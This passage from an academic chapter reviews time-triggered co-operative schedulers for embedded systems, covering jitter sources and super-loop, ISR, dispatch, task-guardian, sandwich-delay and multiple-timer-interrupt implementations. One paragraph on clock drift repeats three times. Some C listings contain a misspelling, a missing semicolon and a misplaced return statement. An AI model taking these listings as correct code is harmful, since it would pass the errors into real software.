it has been widely accepted that TT architectures are a good match for many safety-critical applications, since they can help to improve the overall safety and reliability (Allworth, 1981; Storey, 1996; Nissanke, 1997; Bates; 2000; Obermaisser, 2004). Liu (2000) highlights that TT systems are easy to validate, test, and certify because the times related to the tasks are deterministic. Detailed comparisons between the TT and ET concepts were performed by Kopetz (1991a and 1991b). 3. Schedulers and scheduling algorithms Most embedded systems involve several tasks that share the system resources and communicate with one another and/or the environment in which they operate. For many projects, a key challenge is to work out how to schedule tasks so that they can meet their timing constraints. This process requires an appropriate form of scheduler\(1\). A scheduler can be viewed as a very simple operating system which calls tasks periodically (or aperiodically) during the system operating time. Moreover, as with desktop operating systems, a scheduler has the responsibility to manage the computational and data resources in order to meet all temporal and functional requirements of the system (Mwelwa, 2006). According to the nature of the operating tasks, any real-time scheduler must fall under one of the following types of scheduling policies: **Pre-emptive scheduling:** where a multi-tasking process is allowed. In more details, a task with higher priority is allowed to pre-empt (i.e. interrupt) any lower priority task that is currently running. The lower priority task will resume once the higher priority task finishes executing. For example, suppose that – over a particular period of time – a system needs to execute four tasks (Task A, Task B, Task C, Task D) as illustrated in Fig. 2. ![Fig. 2. A schematic representation of four tasks which need to be scheduled for execution on a single-processor embedded system (Nahas, 2008).](image-url) Assuming a single-processor system is used, Task C and Task D can run as required where Task B is due to execute before Task A is complete. Since no more than one task can run at the same time on a single-processor, Task A or Task B has to relinquish control of the CPU. \(1\) Note that schedulers represent the core components of “Real-Time Operating System” (RTOS) kernels. Examples of commercial RTOSs which are used nowadays are: VxWorks (from Wind River), Lynx (from LynxWorks), RTLinux (from FSMLabs), eCos (from Red Hat), and QNX (from QNX Software Systems). Most of these operating systems require large amount of computational and memory resources which are not readily available in low-cost microcontrollers like the ones targeted in this work. www.intechopen.com In pre-emptive scheduling, a higher priority might be assigned to Task B with the consequence that - when Task B is due to run - Task A will be interrupted, Task B will run, and Task A will then resume and complete (Fig. 3). Co-operative (or “non-pre-emptive”) scheduling: where only a single-tasking process is allowed. In more details, if a higher priority task is ready to run while a lower priority task is running, the former task cannot be released until the latter one completes its execution. For example, assume the same set of tasks illustrated in Fig. 2. In the simplest solution, Task A and Task B can be scheduled co-operatively. In these circumstances, the task which is currently using the CPU is implicitly assigned a high priority: any other task must therefore wait until this task relinquishes control before it can execute. In this case, Task A will complete and then Task B will be executed (Fig. 4). Hybrid scheduling: where a limited, but efficient, multi-tasking capabilities are provided (Pont, 2001). That is, only one task in the whole system is set to be pre-emptive (this task is best viewed as “highest-priority” task), while other tasks are running co-operatively (Fig. 5). In the example shown in the figure, suppose that Task B is a short task which has to execute immediately when it arrives. In this case, Task B is set to be pre-emptive so that it acquires the CPU control to execute whenever it arrives and whether (or not) other task is running. Overall, when comparing co-operative with pre-emptive schedulers, many researchers have argued that co-operative schedulers have many desirable features, particularly for use in safety-related systems (Allworth, 1981; Ward, 1991; Nissanke, 1997; Bates, 2000; Pont, 2001). For example, Bates (2000) identified the following four advantages of co-operative scheduling over pre-emptive alternatives: The scheduler is simpler. The overheads are reduced. Testing is easier. Certification authorities tend to support this form of scheduling. Similarly, Nissake (1997) noted: “[Pre-emptive] schedules carry greater runtime overheads because of the need for context switching - storage and retrieval of partially computed results. [Co-operative] algorithms do not incur such overheads. Other advantages of co-operative algorithms include their better understandability, greater predictability, ease of testing and their inherent capability for guaranteeing exclusive access to any shared resource or data.” Many researchers still, however, believe that pre-emptive approaches are more effective than co-operative alternatives (Allworth, 1981; Cooling, 1991). This can be due to different reasons. As in (Pont, 2001), one of the reasons why pre-emptive approaches are more widely discussed and considered is because of confusion over the options available. Pont gave an example that the basic cyclic scheduling, which is often discussed by many as an alternative to pre-emptive, is not a representative of the wide range of co-operative scheduling architectures that are available. Moreover, one of the main issues that concern people about the reliability of co-operative scheduling is that long tasks can have a negative impact on the responsiveness of the system. This is clearly underlined by Allworth (1981): “[The] main drawback with this co-operative approach is that while the current process is running, the system is not responsive to changes in the environment. Therefore, system processes must be extremely brief if the real-time response [of the] system is not to be impaired.” However, in many practical embedded systems, the process (task) duration is extremely short. For example, calculations of one of the very complicated algorithms, the “proportional integral differential” (PID) controller, can be carried out on the most basic (8-bit) 8051 microcontroller in around 0.4 ms: this imposes insignificant processor load in most systems – including flight control – where 10 ms sampling rate is adequate (Pont, 2001). Pont has also commented that if the system is designed to run long tasks, “this is often because the developer is unaware of some simple techniques that can be used to break down these tasks in an appropriate way and – in effect – convert long tasks called infrequently into short tasks called frequently”: some of these techniques are introduced and discussed in Pont (2001). Moreover, if the performance of the system is seen slightly poor, it is often advised to update the microcontroller hardware rather than to use a more complex software architecture. However, if changing the task design or microcontroller hardware does not provide the level of performance which is desired for a particular application, then more than one microcontroller can be used. In such cases, long tasks can be easily moved to another processor, allowing the host processor to respond rapidly to other events as required (for further details, see Pont, 2001; Ayavoo et al., 2007). Please note that the very wide use of pre-emptive schedulers can simply be resulted from a poor understanding and, hence, undervaluation of the co-operative schedulers. For example, a co-operative scheduler can be easily constructed using only a few hundred lines of highly portable code written in a high-level programming language (such as ‘C’), while the resulting system is highly-predictable (Pont, 2001). It is also important to understand that sometimes pre-emptive schedulers are more widely used in RTOSs due to commercial reasons. For example, companies may have commercial benefits from using pre-emptive environments. Consequently, as the complexity of these environments increases, the code size will significantly increase making ‘in-house’ constructions of such environments too complicated. Such complexity factors lead to the sale of commercial RTOS products at high prices (Pont, 2001). Therefore, further academic research has been conducted in this area to explore alternative solutions. For example, over the last few years, the Embedded Systems Laboratory (ESL) researchers have considered various ways in which simple, highly-predictable, non-pre-emptive (co-operative) schedulers can be implemented in low-cost embedded systems. 4. Scheduling algorithm and scheduler implementation A key component of the scheduler is the scheduling algorithm which basically determines the order in which the tasks will be executed by the scheduler (Buttazzo, 2005). More specifically, a scheduling algorithm is the set of rules that, at every instant while the system is running, determines which task must be allocated the resources to execute. Developers of embedded systems have proposed various scheduling algorithms that can be used to handle tasks in real-time applications. The selection of appropriate scheduling algorithm for a set of tasks is based upon the capability of the algorithm to satisfy all timing constraints of the tasks: where these constraints are derived from the application requirements. Examples of common scheduling algorithms are: Cyclic Executive (Locke, 1992), Rate Monotonic (Liu & Layland, 1973), Earliest-Deadline-First (Liu & Layland, 1973; Liu, 2000), Least-Laxity-First (Mok, 1983), Deadline Monotonic (Leung, 1982) and Shared-Clock (Pont, 2001) schedulers (see Rao et al., 2008 for a simple classification of scheduling algorithms). This chapter outlines one key example of scheduling algorithms that is widely used in the design of real-time embedded systems when highly-predictable system behavior is an essential requirement: this is the Time Triggered Co-operative scheduler which is a form of cyclic executive. Note that once the design specifications are converted into appropriate design elements, the system implementation process can take place by translating those designs into software and hardware components. People working on the development of embedded systems are often concerned with the software implementation of the system in which the system specifications are converted into an executable system (Sommerville, 2007; Koch, 1999). For example, Koch interpreted the implementation of a system as the way in which the software program is arranged to meet the system specifications. The implementation of schedulers is a major problem which faces designers of real-time scheduling systems (for example, see Cho et al., 2005). In their useful publication, Cho and colleges clarified that the well-known term scheduling is used to describe the process of finding the optimal schedule for a set of real-time tasks, while the term scheduler implementation refers to the process of implementing a physical (software or hardware) scheduler that enforces – at run-time – the task sequencing determined by the designed schedule (Cho et al., 2007). Generally, it has been argued that there is a wide gap between scheduling theory and its implementation in operating system kernels running on specific hardware, and for any meaningful validation of timing properties of real-time applications, this gap must be bridged (Katcher et al., 1993). The relationship between any scheduling algorithm and the number of possible implementation options for that algorithm – in practical designs – has generally been viewed as ‘one-to-many’, even for very simple systems (Baker & Shaw, 1989; Koch; 1999; Pont, 2001; Baruah, 2006; Pont et al., 2007; Phatrapornnant, 2007). For example, Pont et al. (2007) clearly mentioned that if someone was to use a particular scheduling architecture, then there are many different implementation options which can be available. This claim was also supported by Phatrapornnant (2007) by noting that the TTC scheduler (which is a form of cyclic executive) is only an algorithm where, in practice, there can be many possible ways to implement such an algorithm. The performance of a real-time system depends crucially on implementation details that cannot be captured at the design level, thus it is more appropriate to evaluate the real-time properties of the system after it is fully implemented (Avrunin et al., 1998). 5. Time-triggered co-operative (TTC) scheduling algorithm A key defining characteristic of a time-triggered (TT) system is that it can be expected to have highly-predictable patterns of behavior. This means that when a computer system has a time-triggered architecture, it can be determined in advance – before the system begins executing – exactly what the system will do at every moment of time while the system is operating. Based on this definition, completely defined TT behavior is – of course – difficult to achieve in practice. Nonetheless, approximations of this model have been found to be useful in a great many practical systems. The closest approximation of a “perfect” TT architecture which is in widespread use involves a collection of periodic tasks which operate co-operatively (or “non-pre-emptively”). Such a time-triggered co-operative (TTC) architecture has sometimes been described as a cyclic executive (e.g. Baker & Shaw, 1989; Locke, 1992). According to Baker and Shaw (1989), the cyclic executive scheduler is designed to execute tasks in a sequential order that is defined prior to system activation; the number of tasks is fixed; each task is allocated an execution slot (called a minor cycle or a frame) during which the task executes; the task – once interleaved by the scheduler – can execute until completion without interruption from other tasks; all tasks are periodic and the deadline of each task is equal to its period; the worst-case execution time of all tasks is known; there is no context switching between tasks; and tasks are scheduled in a repetitive cycle called major cycle. The major cycle can be defined as the time period during which each task in the scheduler executes – at least – once and before the whole task execution pattern is repeated. This is numerically calculated as the lowest common multiple (LCM) of the periods of the scheduled tasks (Baker & Shaw, 1989; Xu & Parnas, 1993). Koch (1999) emphasized that cyclic executive is a “proof-by-construction” scheme in which no schedulability analysis is required prior to system construction. Fig. 6 illustrates the (time-triggered) cyclic executive model for a simple set of four periodic tasks. Note that the final task in the task-group (i.e. Task D) must complete execution before the arrival of the next timer interrupt which launches a new (major) execution cycle. In the example shown, each task is executed only once during the whole major cycle which is, in this case, made up of four minor cycles. Note that the task periods may not always be identical as in the example shown in Fig. 6. When task periods vary, the scheduler should define a sequence in which each task is repeated sufficiently to meet its frequency requirement (Locke, 1992). Fig. 7 shows the general structure of the time-triggered cyclic executive (i.e. time-triggered co-operative) scheduler. In the example shown in this figure, the scheduler has a minor cycle of 10 ms, period values of 20, 10 and 40 ms for the tasks A, B and C, respectively. The LCM of these periods is 40 ms, therefore the length of the major cycle in which all tasks will be executed periodically is 40 ms. It is suggested that the minor cycle of the scheduler (which is also referred to as the tick interval: see Pont, 2001) can be set equal to or less than the greatest common divisor value of all task periods (Phatrapornnant, 2007). In the example shown in Fig. 7, this value is equal to 10 ms. In practice, the minor cycle is driven by a periodic interrupt generated by the overflow of an on-chip hardware timer or by the arrival of events in the external environment (Locke, 1992; Pont, 2001). The vertical arrows in the figure represent the points at which minor cycles (ticks) start. Overall, TTC schedulers have many advantages. A key recognizable advantage is its simplicity (Baker & Shaw, 1989; Liu, 2000; Pont, 2001). Furthermore, since pre-emption is not allowed, mechanisms for context switching are, hence, not required and, as a consequence, the run-time overhead of a TTC scheduler can be kept very low (Locke, 1992; Buttazzo, 2005). Also, developing TTC schedulers needs no concern about protecting the integrity of shared data structures or shared resources because, at a time, only one task in the whole system can exclusively use the resources and the next due task cannot begin its execution until the running task is completed (Baker & Shaw, 1989; Locke, 1992). Since all tasks are run regularly according to their predefined order in a deterministic manner, the TTC schedulers demonstrate very low levels of task jitter (Locke, 1992; Bate, 1998; Buttazzo, 2005) and can maintain their low-jitter characteristics even when complex techniques, such as dynamic voltage scaling (DVS), are employed to reduce system power consumption (Phatrapornnan & Pont, 2006). Therefore, as would be expected (and unlike RM designs, for example), systems with TTC architectures can have highly-predictable timing behavior (Baker & Shaw, 1989; Locke, 1992). Locke (1992) underlines that with cyclic executive systems, “it is possible to predict the entire future history of the state of the machine, once the start time of the system is determined (usually at power-on). Thus, assuming this future history meets the response requirements generated by the external environment in which the system is to be used, it is clear that all response requirements will be met. Thus it fulfills the basic requirements of a hard real time system.” Provided that an appropriate implementation is used, TTC architectures can be a good match for a wide range of low-cost embedded applications. For example, previous studies have described – in detail – how these techniques can be applied in various automotive applications (e.g. Ayavoo et al., 2006; Ayavoo, 2006), a wireless (ECG) monitoring system (Phatrapornnan & Pont, 2004; Phatrapornnan, 2007), various control applications (e.g. Edwards et al., 2004; Key et al., 2004; Short & Pont, 2008), and in data acquisition systems, washing-machine control and monitoring of liquid flow rates (Pont, 2002). Outside the ESL group, Nghiem et al. (2006) described an implementation of PID controller using TTC scheduling algorithm and illustrated how such architecture can help increase the overall system performance as compared with alternative implementation methods. However, TTC architectures have some shortcomings. For example, many researchers argue that running tasks without pre-emption may cause other tasks to wait for some time and hence miss their deadlines. However, the availability of high-speed, COTS microcontrollers nowadays helps to reduce the effect of this problem and, as processor speeds continue to increase, non-pre-emptive scheduling approaches are expected to gain more popularity in the future (Baruah, 2006). Another issue with TTC systems is that the task schedule is usually calculated based on estimates of Worst Case Execution Time (WCET) of the running tasks. If such estimates prove to be incorrect, this may have a serious impact on the system behavior (Buttazzo, 2005). One recognized disadvantage of using TTC schedulers is the lack of flexibility (Locke, 1992; Bate, 1998). This is simply because TTC is usually viewed as ‘table-driven’ static scheduler (Baker & Shaw, 1989) which means that any modification or addition of a new functionality, during any stage of the system development process, may need an entirely new schedule to be designed and constructed (Locke, 1992; Koch, 1999). This reconstruction of the system adds more time overhead to the design process: however, with using tools such as those developed recently to support “automatic code generation” (Mwelwa et al., 2006; Mwelwa, 2006; Kurian & Pont, 2007), the work involved in developing and maintaining such systems can be substantially reduced. Another drawback of TTC systems, as noted by Koch (1999), is that constructing the cyclic executive model for a large set of tasks with periods that are prime to each other can be unaffordable. However, in practice, there is some flexibility in the choice of task periods (Xu & Parnas, 1993; Pont, 2001). For example, Gerber et al. (1995) demonstrated how a feasible solution for task periods can be obtained by considering the period harmonicity relationship of each task with all its successors. Kim et al. (1999) went further to improve and automate this period calibration method. Please also note that using a table to store the task schedule is only one way of implementing TTC algorithm where, in practice, there can be other implementation methods (Baker & Shaw, 1989; Pont, 2001). For example, Pont (2001) described an alternative to table-driven schedule implementation for the TTC algorithm which has the potential to solve the co-prime periods problem and also simplify the process of modifying the whole task schedule later in the development life cycle or during the system run-time. Furthermore, it has also been reported that a long task whose execution time exceeds the period of the highest rate (shortest period) task cannot be scheduled on the basic TTC scheduler (Locke, 1992). One solution to this problem is to break down the long task into multiple short tasks that can fit in the minor cycle. Also, possible alternative solution to this problem is to use a Time-Triggered Hybrid (TTH) scheduler (Pont, 2001) in which a limited degree of pre-emption is supported. One acknowledged advantage of using TTH scheduler is that it enables the designer to build a static, fixed-priority schedule made up of a collection of co-operative tasks and a single (short) pre-emptive task (Phatrapornnant, 2007). Note that TTH architectures are not covered in the context of this chapter. For more details about these scheduling approaches, see (Pont, 2001; Maaita & Pont, 2005; Hughes & Pont, 2008; Phatrapornnant, 2007). Please note that later in this chapter, it will be demonstrated how, with extra care at the implementation stage, one can easily deal with many of the TTC scheduler limitations indicated above. 6. Jitter in TTC scheduling algorithm Jitter is a term which describes variations in the timing of activities (Wavecrest, 2001). The work presented in this chapter is concerned with implementing highly-predictable embedded systems. Predictability is one of the most important objectives of real-time embedded systems which can simply be defined as the ability to determine, in advance, exactly what the system will do at every moment of time in which it is running. One way in which predictable behavior manifests itself is in low levels of task jitter. Jitter is a key timing parameter that can have detrimental impacts on the performance of many applications, particularly those involving period sampling and/or data generation (e.g. data acquisition, data playback and control systems: see Torngren, 1998). For example, Cottet & David (1999) show that – during data acquisition tasks – jitter rates of 10% or more can introduce errors which are so significant that any subsequent interpretation of the sampled signal may be rendered meaningless. Similarly, Jerri (1977) discusses the serious impact of jitter on applications such as spectrum analysis and filtering. Also, in control systems, jitter can greatly degrade the performance by varying the sampling period (Torngren, 1998; Marti et al., 2001). When TTC architectures (which represent the main focus of this chapter) are employed, possible sources of task jitter can be divided into three main categories: scheduling overhead variation, task placement and clock drift. The overhead of a conventional (non-co-operative) scheduler arises mainly from context switching. However, in some TTC systems the scheduling overhead is comparatively large and may have a highly variable duration due to code branching or computations that have non-fixed lengths. As an example, Fig. 8 illustrates how a TTC system can suffer release jitter as a result of variations in the scheduler overhead (this relates to DVS system). Even if the scheduler overhead variations can be avoided, TTC designs can still suffer from jitter as a result of the task placement. To illustrate this, consider Fig. 9. In this schedule example, Task C runs sometimes after A, sometimes after A and B, and sometimes alone. Therefore, the period between every two successive runs of Task C is highly variable. Moreover, if Task A and B have variable execution durations (as in Fig. 8), then the jitter levels of Task C will even be larger. For completeness of this discussion, it is also important to consider clock drift as a source of task jitter. In the TTC designs, a clock “tick” is generated by a hardware timer that is used to trigger the execution of the cyclic tasks (Pont, 2001). This mechanism relies on the presence of a timer that runs at a fixed frequency. In such circumstances, any jitter will arise from variations at the hardware level (e.g. through the use of a low-cost frequency source, such as a ceramic resonator, to drive the on-chip oscillator: see Pont, 2001). In the TTC scheduler implementations considered in this study, the software developer has no control over the clock source. However, in some circumstances, those implementing a scheduler must take such factors into account. For example, in situations where DVS is employed (to reduce CPU power consumption), it may take a variable amount of time for the processor’s phase-locked loop (PLL) to stabilize after the clock frequency is changed (see Fig. 10). For completeness of this discussion, it is also important to consider clock drift as a source of task jitter. In the TTC designs, a clock “tick” is generated by a hardware timer that is used to trigger the execution of the cyclic tasks (Pont, 2001). This mechanism relies on the presence of a timer that runs at a fixed frequency. In such circumstances, any jitter will arise from variations at the hardware level (e.g. through the use of a low-cost frequency source, such as a ceramic resonator, to drive the on-chip oscillator: see Pont, 2001). In the TTC scheduler implementations considered in this study, the software developer has no control over the clock source. However, in some circumstances, those implementing a scheduler must take such factors into account. For example, in situations where DVS is employed (to reduce CPU power consumption), it may take a variable amount of time for the processor’s phase-locked loop (PLL) to stabilize after the clock frequency is changed (see Fig. 10). For completeness of this discussion, it is also important to consider clock drift as a source of task jitter. In the TTC designs, a clock “tick” is generated by a hardware timer that is used to trigger the execution of the cyclic tasks (Pont, 2001). This mechanism relies on the presence of a timer that runs at a fixed frequency. In such circumstances, any jitter will arise from variations at the hardware level (e.g. through the use of a low-cost frequency source, such as a ceramic resonator, to drive the on-chip oscillator: see Pont, 2001). In the TTC scheduler implementations considered in this study, the software developer has no control over the clock source. However, in some circumstances, those implementing a scheduler must take such factors into account. For example, in situations where DVS is employed (to reduce CPU power consumption), it may take a variable amount of time for the processor’s phase-locked loop (PLL) to stabilize after the clock frequency is changed (see Fig. 10). As discussed elsewhere, it is possible to compensate for such changes in software and thereby reduce jitter (see Phatrapornnant & Pont, 2006; Phatrapornnant, 2007). 7. Various TTC scheduler implementations for highly-predictable embedded systems In this section, a set of “representative” examples of the various classes of TTC scheduler implementations are reviewed. In total, the section reviews six TTC implementations. 7.1 Super loop (SL) scheduler The simplest practical implementation of a TTC scheduler can be created using a “Super Loop” (SL) (sometimes called an “endless loop: Kalinsky, 2001). The super loop can be used as the basis for implementing a simple TTC scheduler (e.g. Pont, 2001; Kurian & Pont, 2007). A possible implementation of TTC scheduler using super loop is illustrated in Listing 1. ```c int main(void) { ... while(1) { TaskA(); Delay_6ms(); TaskB(); Delay_6ms(); TaskC(); Delay_6ms(); } // Should never reach here return 1 } ``` Listing 1. A very simple TTC scheduler which executes three periodic tasks, in sequence. By assuming that each task in Listing 1 has a fixed duration of 4 ms, a TTC system with a 10 ms “tick interval” has been created using a combination of super loop and delay functions (Fig. 11). ![Fig. 11. The task executions resulting from the code in Listing 1 (Nahas, 2011b).](image_url) In the case where the scheduled tasks have variable durations, creating a fixed tick interval is not straightforward. One way of doing that is to use a “Sandwich Delay” (Pont et al., 2006) placed around the tasks. Briefly, a Sandwich Delay (SD) is a mechanism – based on a... hardware timer – which can be used to ensure that a particular code section always takes approximately the same period of time to execute. The SD operates as follows: [1] A timer is set to run; [2] An activity is performed; [3] The system waits until the timer reaches a predetermined count value. In these circumstances – as long as the timer count is set to a duration that exceeds the WCET of the sandwiched activity – SD mechanism has the potential to fix the execution period. Listing 2 shows how the tasks in Listing 1 can be scheduled – again using a 10 ms tick interval – if their execution durations are not fixed. ```c int main(void) { while(1) { // Set up a Timer for sandwich delay SANDWICH_DELAY_Start(); // Add Tasks in the first tick interval Task_A(); // Wait for 10 millisecond sandwich delay // Add Tasks in the second tick interval SANDWICH_DELAY_Wait(10); Task_B(); // Wait for 20 millisecond sandwich delay // Add Tasks in the second tick interval SANDWICH_DELAY_Wait(20); Task_C(); // Wait for 30 millisecond sandwich delay SANDWITCH_DELAY_Wait(30); // Should never reach here return 1; } } ``` Listing 2. A TTC scheduler which executes three periodic tasks with variable durations, in sequence. Using the code listing shown, the successive function calls will take place at fixed intervals, even if these functions have large variations in their durations (Fig. 12). For further information, see (Nahas, 2011b). Fig. 12. The task executions expected from the TTC-SL scheduler code shown in Listing 2 (Nahas, 2011b). ### 7.2 A TTC-ISR scheduler In general, software architectures based on super loop can be seen simple, highly efficient and portable (Pont, 2001; Kurian & Pont, 2007). However, these approaches lack the provision of accurate timing and the efficiency in using the power resources, as the system always operates at full-power which is not necessary in many applications. An alternative (and more efficient) solution to this problem is to make use of the hardware resources to control the timing and power behavior of the system. For example, a TTC scheduler implementation can be created using “Interrupt Service Routine” (ISR) linked to the overflow of a hardware timer. In such approaches, the timer is set to overflow at regular “tick intervals” to generate periodic “ticks” that will drive the scheduler. The rate of the tick interval can be set equal to (or higher than) the rate of the task which runs at the highest frequency (Phatrapornnant, 2007). In the TTC-ISR scheduler, when the timer overflows and a tick interrupt occurs, the ISR will be called, and awaiting tasks will then be activated from the ISR directly. Fig. 13 shows how such a scheduler can be implemented in software. In this example, it is assumed that one of the microcontroller’s timers has been set to generate an interrupt once every 10 ms, and thereby call the function Update(). This Update() function represents the scheduler ISR. At the first tick, the scheduler will run Task A then go back to the while loop in which the system is placed in the idle mode waiting for the next interrupt. When the second interrupt takes place, the scheduler will enter the ISR and run Task B, then the cycle continues. The overall result is a system which has a 10 ms “tick interval” and three tasks executed in sequence (see Fig. 14). ``` while(1) { Go_To_Sleep(); } ``` ``` void Update(void) { Tick_G++; switch(Tick_G) { case 1: Task_A(); break; case 2: Task_B(); break; case 3: Task_C(); Tick_G = 0; } } ``` Fig. 13. A schematic representation of a simple TTC-ISR scheduler (Nahas, 2008). Whether or not the idle mode is used in TTC-ISR scheduler, the timing observed is largely independent of the software used but instead depends on the underlying timer hardware (which will usually mean the accuracy of the crystal oscillator driving the microcontroller). One consequence of this is that, for the system shown in Fig. 13 (for example), the successive function calls will take place at precisely-defined intervals, even if there are large variations... in the duration of tasks which are run from the `Update()` function (Fig. 14). This is very useful behavior which is not easily obtained with implementations based on super loop. The function call tree for the TTC-ISR scheduler is shown in Fig. 15. For further information, see (Nahas, 2008). ![Fig. 14: The task executions expected from the TTC-ISR scheduler code shown in Fig. 13 (Nahas, 2008).](image) Fig. 14: The task executions expected from the TTC-ISR scheduler code shown in Fig. 13 (Nahas, 2008). 7.3 TTC-dispatch scheduler Implementation of a TTC-ISR scheduler requires a significant amount of hand coding (to control the task timing), and there is no division between the “scheduler” code and the “application” code (i.e. tasks). The TTC-Dispatch scheduler provides a more flexible alternative. It is characterized by distinct and well-defined scheduler functions. Like TTC-ISR, the TTC-Dispatch scheduler is driven by periodic interrupts generated from an on-chip timer. When an interrupt occurs, the processor executes an `Update()` function. In the scheduler implementation discussed here, the `Update()` function simply keeps track of the number of ticks. A `Dispatch()` function will then be called, and the due tasks (if any) will be executed one-by-one. Note that the `Dispatch()` function is called from an “endless” loop placed in the function `Main()`: see Fig. 16. When not executing the `Update()` or `Dispatch()` functions, the system will usually enter the low-power idle mode. In this TTC implementation, the software employs a `SCH_Add_Task()` and a `SCH_Delete_Task()` functions to help the scheduler add and/or remove tasks during the system run-time. Such scheduler architecture provides support for “one shot” tasks and dynamic scheduling where tasks can be scheduled online if necessary (Pont, 2001). To add a task to the scheduler, two main parameters have to be defined by the user in addition to the task’s name: task’s offset, and task’s period. The offset specifies the time (in ticks) before the task is first executed. The period specifies the interval (also in ticks) between repeated executions of the task. In the `Dispatch()` function, the scheduler checks these parameters for each task before running it. Please note that information about tasks is stored in a user-defined scheduler data structure. Both the “sTask” data type and the “SCH_MAX_TASKS” constant are used to create the “Task Array” which is referred to throughout the scheduler. as “sTask SCH_tasks_G[SCH_MAX_TASKS]”. See (Pont, 2001) for further details. The function call tree for the TTC-Dispatch scheduler is shown in Fig. 16. ![Function call tree for the TTC-Dispatch scheduler](image) Fig. 16. Function call tree for the TTC-Dispatch scheduler (Nahas, 2011a). Fig. 16 illustrates the whole scheduling process in the TTC-Dispatch scheduler. For example, it shows that the first function to run (after the startup code) is the `Main()` function. The `Main()` calls `Dispatch()` which in turn launches any tasks which are currently scheduled to execute. Once these tasks are complete, the control will return back to `Main()` which calls `Sleep()` to place the processor in the idle mode. The timer interrupt then occurs which will wake the processor up from the idle state and invoke the ISR `Update()`. The function call then returns all the way back to `Main()`, where `Dispatch()` is called again and the whole cycle thereby continues. For further information, see (Nahas, 2008). ### 7.4 Task Guardians (TG) scheduler Despite many attractive characteristics, TTC designs can be seriously compromised by tasks that fail to complete within their allotted periods. The TTC-TG scheduler implementation described in this section employs a Task Guardian (TG) mechanism to deal with the impact of such task overruns. When dealing with task overruns, the TG mechanism is required to shutdown any task which is found to be overrunning. The proposed solution also provides the option of replacing the overrunning task with a backup task (if required). The implementation is again based on TTC-Dispatch (Section 7.3). In the event of a task overrun with ordinary Dispatch scheduler, the timer ISR will interrupt the overrunning task (rather than the `Sleep()` function). If the overrunning task keeps executing then it will be periodically interrupted by `Update()` while all other tasks will be blocked until the task finishes (if ever): this is shown in Fig. 17. Note that (a) illustrates the required task schedule, and (b) illustrates the scheduler operation when Task A overrun by 5 tick interval. ![Impact of task overrun on a TTC scheduler](image) Fig. 17. The impact of task overrun on a TTC scheduler (Nahas, 2008). In order for the TG mechanism to work, various functions in the TTC-Dispatch scheduler are modified as follows: - **Dispatch()** indicates that a task is being executed. - **Update()** checks to see if an overrun has occurred. If it has, control is passed back to **Dispatch()**, shutting down the overrunning task. - If a backup task exists it will be executed by **Dispatch()**. - Normal operation then continues. In a little more detail, detecting overrun in this implementation uses a simple, efficient method employed in the **Dispatch()** function. It simply adds a “Task_Overrun” variable which is set equal to the task index before the task is executed. When the task completes, this variable will be assigned the value of (for example) 255 to indicate a successful completion. If a task overruns, the **Update()** function in the next tick should detect this since it checks the Task_overrun variable and the last task index value. The **Update()** then changes the return address to an **End_Task()** function instead of the overrunning task. The **End_Task()** function should return control to **Dispatch()**. Note that moving control from **Update()** to **End_Task()** is a nontrivial process and can be done by different ways (Hughes & Pont, 2004). The **End_Task()** has the responsibility to shutdown the overrunning task. Also, it determines the type of function that has overrun and begins to restore register values accordingly. This process is complicated which aims to return the scheduler back to its normal operation making sure the overrun has been resolved completely. Once the overrun is dealt with, the scheduler replaces the overrunning task with a backup task which is set to run immediately before running other tasks. If there is no backup task defined by the user, then the TTC-TG scheduler implements a mechanism which turns the priority of the task that overrun to the lowest so as to reduce the impact of any future overrunning by this task. The function call tree for the TTC-TTG scheduler can be shown in Fig. 18. ![Function call tree for TTC-TG scheduler](https://www.intechopen.com) **Fig. 18.** Function call tree for the TTC-TG scheduler (Nahas, 2008). Note that the scheduler structure used in TTC-TG scheduler is same as that employed in the TTC-Dispatch scheduler which is simply based on ISR Update linked to a timer interrupt and a Dispatch function called periodically from the Main code (Section 7.3). For further details, see (Hughes & Pont, 2008). ### 7.5 Sandwich Delay (SD) scheduler In Section 6, the impact of task placement on “low-priority” tasks running in TTC schedulers was considered. The TTC schedulers described in Sections 7.1 - 7.4 lack the ability to deal with jitter in the starting time of such tasks. One way to address this issue is to place “Sandwich Delay” (Pont et al., 2006) around tasks which execute prior to other tasks in the same tick interval. In the TTC-SD scheduler described in this section, sandwich delays are used to provide execution “slots” of fixed sizes in situations where there is more than one task in a tick interval. To clarify this, consider the set of tasks shown in Fig. 19. In the figure, the required SD prior to Task C – for low jitter behavior – is equal to the WCET of Task A plus the WCET of Task B. This implies that in the second tick (for example), the scheduler runs Task A and then waits for the period equals to the WCET of Task B before running Task C. The figure shows that when SDs are placed around the tasks prior to Task C, the periods between successive runs of Task C become equal and hence jitter in the release time of this task is significantly reduced. ![Fig. 19: Using Sandwich Delays to reduce release jitter in TTC schedulers (Nahas, 2011a).](www.intechopen.com) Note that – with this implementation – the WCET for each task is input to the scheduler through a `SCH_Task_WCET()` function placed in the Main code. After entering task parameters, the scheduler employs `Calc_Sch_Major_Cycle()` and `Calculate_Task_RT()` functions to calculate the scheduler major cycle and the required release time for the tasks, respectively. The release time values are stored in the “Task Array” using the variable `SCH_tasks_G[Index].Rls_time`. Note that the required release time of a task is the time between the start of the tick interval and the start time of the task “slot” plus a little safety margin. For further information, see (Nahas, 2011a). ### 7.6 Multiple Timer Interrupts (MTI) scheduler An alternative to the SD technique which requires a large computational time, a “gap insertion” mechanism that uses “Multiple Timer Interrupts” (MTIs) can be employed. In the TTC-MTI scheduler described in this section, multiple timer interrupts are used to generate the predefined execution “slots” for tasks. This allows more precise control of timing in situations where more than one task executes in a given tick interval. The use of interrupts also allows the processor to enter an idle mode after completion of each task, resulting in power saving. In order to implement this technique, two interrupts are required: - **Tick interrupt:** used to generate the scheduler periodic tick. - **Task interrupt:** used – within tick intervals – to trigger the execution of tasks. The process is illustrated in Fig. 20. In this figure, to achieve zero jitter, the required release time prior to Task C (for example) is equal to the WCET of Task A plus the WCET of Task B plus scheduler overhead (i.e. ISR `Update()` function). This implies that in the second tick (for example), after running the ISR, the scheduler waits – in idle mode – for a period of time equals to the WCETs of Task A and Task B before running Task C. Fig. 20 shows that when an MTI method is used, the periods between the successive runs of Task C (the lowest priority task in the system) are always equal. This means that the task jitter in such implementation is independent on the task placement or the duration(s) of the preceding task(s). Fig. 20. Using MTIs to reduce release jitter in TTC schedulers (Nahas, 2011a). In the implementation considered in this section, the WCET for each task is input to the scheduler through SCH_Task_WCET() function placed in the Main() code. The scheduler then employs Calc_Sch_Major_Cycle() and Calculate_Task_RT() functions to calculate the scheduler major cycle and the required release time for the tasks, respectively. Moreover, there is no Dispatch() called in the Main() code: 